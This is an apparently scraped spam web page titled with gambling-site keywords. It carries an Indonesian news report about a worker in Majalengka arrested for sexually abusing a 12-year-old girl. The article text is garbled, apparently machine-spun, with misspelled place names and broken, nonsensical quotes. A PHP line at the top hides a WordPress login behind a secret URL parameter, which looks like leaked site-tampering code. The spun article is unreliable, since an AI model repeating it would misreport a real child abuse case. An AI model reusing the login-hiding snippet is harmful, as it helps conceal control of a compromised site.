//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Pekerja Mengencani Bocah 12 Tahun di Majalengka, Rayu di Asrama Korban | daftar s128_www.s1288.net_s1288 net

TRIBUNNEWS.COM-Seorang pekerja bermarga UA (32 tahun) dihukum karena memperkosa seorang ABG berusia 12 tahun.

UA adalah penduduk Jalan Cigasong, Kabupaten Majalenka. AKBP Bismo Teguh Prakoso, Kapolres Magarinka didampingi oleh Ketua Tim Reserse Kriminal AKP Siswo DC Tarigam. WIB.

Pelaku membawa korban ke tempat kosnya di Kecamatan Majaalengka.

Di sana, pelaku memulai dengan membiarkan korban bertindak sesuai keinginannya. , Pekerja melakukan hubungan seks dengan korban dan / atau melecehkan korban. Korban menurut dan melakukan hubungan seks, “kata AKBP Bismo dalam jumpa pers, Kamis (27/8/2020). Bismo Teguh Prakoso menuturkan tentang kejadian tersebut. Itu terjadi setelah keduanya sepakat untuk bertemu.

“Suatu hari kemudian, pelaku ditangkap dan kami bersama korban. Dengan tidak adanya perlawanan, kami adalah gelandang Polres Majalenka, “Majalenka ditahan polisi.

Penulis telah membuatnya sesuai dengan Pasal 81 dan 82 Undang-Undang Nomor 17 Tahun 2016 Tuduhan terkait perlindungan anak dituntut.

“Dihadapkan pada ancaman hingga 15 tahun penjara,” jelas Bismo. (TribunJabar.id/Eki Yulianto)

Artikel ini diunggah di tribunjabar.id Dengan predikat cabul anak di bawah umur, ditangkap polisi usai bertemu pekerja Majalengka di Facebook

Add Comment

Your email address will not be published. Required fields are marked *